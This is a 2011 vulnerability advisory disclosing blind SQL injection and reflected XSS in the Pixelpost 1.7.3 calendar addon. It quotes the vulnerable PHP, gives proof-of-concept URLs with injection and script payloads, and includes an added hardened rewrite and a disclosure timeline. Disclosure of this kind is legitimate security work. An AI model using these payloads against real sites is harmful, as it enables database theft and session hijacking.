ush.it - a beautiful place

Pixelpost (Calendar addon 1.1.6) 1.7.3 Multiple vulnerabilities

April 7, 2011 at 5:46 pm - Filed under Hacks - 1033 words, reading time ~3 minutes

Simone "negator" Onofri found multiple issues in a nice image gallery script that he was going to use for his personal purposes; perhaps it's better to wait a couple of releases before using this in production. Since the vendor was not responsive, this is a forced release. The vulnerabilities found include Blind SQL Injection and XSS.

Pixelpost (Calendar addon 1.1.6) 1.7.3 Multiple vulnerabilities

 Name              Pixelpost (Calendar 1.1.6) 1.7.3 Multiple vulnerabilities
 Systems Affected  Pixelpost v1.7.3
 Severity          High
 Impact            High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C)
 Vendor            http://www.pixelpost.org/
 Advisory          http://www.ush.it/team/negator/hack-pixelpost_173/adv.txt
 Author            Simone "negator" Onofri
 Date              20110407

I. BACKGROUND

Pixelpost is an open-source, standards-compliant, multi-lingual, fully
extensible photoblog application for the web.

II. DESCRIPTION

The "Calendar" addon of Pixelpost, a pretty looking image gallery written
in PHP, is vulnerable to Blind SQL Injection and XSS.

III. ANALYSIS

Summary:
       A) Blind SQL Injection (SQLI) Vulnerability
       B) Reflected Cross Site Scripting (XSS) Vulnerability

A) Blind SQL Injection (SQLI) Vulnerability

A blind SQL Injection vulnerability exists in Pixelpost version 1.7.3.

The calendar functionality must be enabled: it's an addon distributed
with the package but disabled by default.

The GET variable "category" is inserted into a SELECT query without
sanitization or a cast to an integer type in "addon/calendar.php":

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$query2 = mysql_query("SELECT a.* FROM ".$pixelpost_db_prefix."pixelpost
a, ".$pixelpost_db_prefix."catassoc b WHERE b.cat_id = '" .
$_GET["category"] . "' AND a.id = b.image_id AND (a.datetime like
'$prev_browsing_month_day%') ORDER BY a.datetime desc limit 1");

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

It's possible to exploit the issue in the standard blind way, for
example using TRUE/FALSE conditions (tautology-based bisection):

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/pixelpost/index.php?curr_month=4&curr_year=2011&showimage=3&category=10'+AND+'1'='1

http://www.example.com/pixelpost/index.php?curr_month=4&curr_year=2011&showimage=3&category=10'+AND+'1'='0

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

B) Reflected Cross Site Scripting (XSS) Vulnerability

A Reflected Cross Site Scripting vulnerability exists in Pixelpost
version 1.7.3 in the calendar addon, which is shipped by default but
disabled.

The GET variables "curr_year" and "category" are reflected in the page
without proper output encoding in "addon/calendar.php":

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$cal_vz .= "
<table class='table-calendar-vz' cellspacing='0'>
<tr>
<td class='td-calendar-navi-vz'><a href='$PHP_SELF?curr_month=$prev_month&curr_year=$prev_year&showimage=$prev_image_id$geos_cat_id'>&laquo;</a></td>
<td colspan='5' class='td-calendar-navi-vz'>
       $asc_mon-$curr_year
</td>
<td class='td-calendar-navi-vz'><a href='$PHP_SELF?curr_month=$next_month&curr_year=$next_year&showimage=$next_image_id$geos_cat_id'>&raquo;</a></td>
</tr>
<tr>";

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PoC URL that exploits this vulnerability:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/pixelpost/index.php?curr_month=4&curr_year=2011'><script>alert('XSS')</script>&showimage=3&category=1'><script>alert('XSS2')</script>

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

We did not investigate issues that may occur with register_globals on.
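A hardened rewrite of the two "addon/calendar.php" fragments quoted in A) and B), added here as an example; it is not Pixelpost's own code nor a vendor fix. It assumes the surrounding addon variables ($pixelpost_db_prefix, $prev_browsing_month_day, $prev_month, $prev_year, $prev_image_id, $next_month, $next_year, $next_image_id, $asc_mon) are set as in the original, replaces $geos_cat_id with a suffix built from the cast category value, and uses a hypothetical helper named h().

```php
<?php
// Added example (not Pixelpost's code): hardened form of the two
// calendar.php fragments from the advisory. Variables not defined here
// are assumed to be set by the surrounding addon code as in the original.

// A) Blind SQLi: b.cat_id is a numeric key, so cast "category" to int
// before it reaches the query. Non-numeric input becomes 0 and the
// quotes around the value are no longer needed.
$category = isset($_GET['category']) ? (int) $_GET['category'] : 0;

// $prev_browsing_month_day is computed by the addon; escaping it as well
// costs nothing with the legacy mysql_* API used by Pixelpost 1.7.3.
$month_prefix = mysql_real_escape_string($prev_browsing_month_day);

$query2 = mysql_query(
    "SELECT a.* FROM " . $pixelpost_db_prefix . "pixelpost a, "
    . $pixelpost_db_prefix . "catassoc b "
    . "WHERE b.cat_id = " . $category . " "
    . "AND a.id = b.image_id "
    . "AND (a.datetime LIKE '" . $month_prefix . "%') "
    . "ORDER BY a.datetime DESC LIMIT 1"
);

// B) Reflected XSS: every value echoed into the markup is HTML-encoded.
// curr_year is an integer too, so cast it; PHP_SELF is read from
// $_SERVER instead of relying on register_globals.
function h($v) { return htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8'); }

$curr_year  = isset($_GET['curr_year']) ? (int) $_GET['curr_year'] : (int) date('Y');
$self       = h($_SERVER['PHP_SELF']);
$cat_suffix = $category > 0 ? '&amp;category=' . $category : ''; // replaces $geos_cat_id

$cal_vz .= "
<table class='table-calendar-vz' cellspacing='0'>
<tr>
<td class='td-calendar-navi-vz'><a href='$self?curr_month=" . h($prev_month)
  . "&amp;curr_year=" . h($prev_year) . "&amp;showimage=" . h($prev_image_id)
  . "$cat_suffix'>&laquo;</a></td>
<td colspan='5' class='td-calendar-navi-vz'>
       " . h($asc_mon) . "-$curr_year
</td>
<td class='td-calendar-navi-vz'><a href='$self?curr_month=" . h($next_month)
  . "&amp;curr_year=" . h($next_year) . "&amp;showimage=" . h($next_image_id)
  . "$cat_suffix'>&raquo;</a></td>
</tr>
<tr>";
```

With the integer cast in place both PoC URLs from A) collapse to category=10, so the TRUE/FALSE pages become identical and the blind oracle disappears; the XSS PoC from B) is rendered as literal text.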

IV. DETECTION

Pixelpost 1.7.3 and possibly earlier versions are vulnerable.

V. WORKAROUND

No fix available.

VI. VENDOR RESPONSE

No vendor response.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20110309 Bug discovered
20110309 Vendor contacted
20110321 Advisory release scheduled for 20110407
20110407 Advisory released

IX. REFERENCES

Well you know what a SQLi or XSS is, right?

X. CREDIT

Simone "negator" Onofri is credited for the discovery of this
vulnerability.

Thanks to Francesco "ascii" Ongaro for revision and fine editing.

Simone "negator" Onofri
web site: http://simone.onofri.net/
mail: simone AT onofri DOT net

Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

XI. LEGAL NOTICES

Copyright (c) 2011 Francesco "ascii" Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.